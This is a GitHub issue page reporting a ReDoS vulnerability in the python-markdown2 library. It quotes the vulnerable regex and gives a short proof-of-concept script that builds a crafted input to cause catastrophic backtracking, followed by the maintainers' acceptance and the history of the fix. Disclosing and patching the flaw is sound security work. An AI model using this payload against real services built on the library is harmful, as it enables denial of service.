Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

A ReDoS vulnerability exists in markdown2.py #493

Closed
DarkTinia opened this issue Jan 17, 2023 · 1 comment · Fixed by #494 or #531
Closed

A ReDoS vulnerability exists in markdown2.py #493

DarkTinia opened this issue Jan 17, 2023 · 1 comment · Fixed by #494 or #531

Comments

@DarkTinia
Copy link
Contributor

DarkTinia commented Jan 17, 2023
edited

The affected code is located in markdown2.py-line2251. It uses the vulnerable regular expression \*\*(?=\S)(.+?[*_]*)(?<=\S)\*\*. When the match fails, it will cause catastrophic backtracking.
I trigger the vulnerability using the python script below

import os
f = open('attack.md','a')
f.write('**_' + '*_'*38730*10 + '\x00')
f.close()
os.system("python markdown2.py attack.md")

I can provide you a patch to repair the ReDoS vulnerability
@nicholasserra
Copy link
Collaborator

Thanks for the report! Yes if you'd like to contribute a patch a PR is welcome :)

@DarkTinia DarkTinia mentioned this issue Jan 18, 2023
Merged
@Crozzers Crozzers mentioned this issue Sep 25, 2023
Merged
nicholasserra added a commit that referenced this issue Oct 9, 2023
@nicholasserra
Merge pull request #531 from Crozzers/repair_ReDoS
191b660 
Repair ReDoS (issue #493, PR #494)
Crozzers added a commit to Crozzers/python-markdown2 that referenced this issue Oct 18, 2023
@Crozzers
Fix trentm#493 persisting when code-friendly extra enabled due to r…
78b6139 
…egex oversight.

Forgot to apply all the same changes to code friendly strong re that I did to regular strong re
nicholasserra added a commit that referenced this issue Oct 20, 2023
@nicholasserra
Merge pull request #532 from Crozzers/fix-code-friendly-specific-redos
958eea4 
Fix #493 persisting when `code-friendly` extra enabled
@Crozzers Crozzers mentioned this issue Dec 9, 2023
Merged
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
2 participants
@nicholasserra @DarkTinia